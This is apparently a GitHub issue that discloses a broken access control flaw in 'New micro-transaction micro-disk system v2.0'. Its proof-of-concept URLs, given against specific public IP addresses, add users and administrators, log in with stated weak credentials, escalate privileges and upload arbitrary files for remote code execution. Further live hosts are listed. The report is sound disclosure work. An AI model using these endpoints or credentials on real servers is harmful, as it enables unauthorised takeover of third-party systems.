You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
New micro-transaction micro-disk system v2.0 Incorrect access control causes RCE
The new micro-transaction micro-disk system V2.0, the front-end controller of the website, there are codes for common users and administrators for test addition, code path files:
\application\index\controller\Test.php
New micro-transaction micro-disk system v2.0 Incorrect access control causes RCE
The new micro-transaction micro-disk system V2.0, the front-end controller of the website, there are codes for common users and administrators for test addition, code path files:
\application\index\controller\Test.php
POC:http://54.238.89.224/index/test/adduser
http://54.238.89.224/admin/login/login.html Log in to the background with the added administrator user and password: 15749806171/123456
The platform is not restrictive on permissions, which leads to horizontal overreach. Use the added common administrative users to add the administrator account POC:
http://54.238.89.224/admin/system/adminadd
Upload any malicious file without authorization POC:
http://54.238.89.224//admin/setup/qcode.html
Other cases:
http://42.192.135.60/index/test/adduser
https://45.66.191.50/index/test/adduser
The text was updated successfully, but these errors were encountered: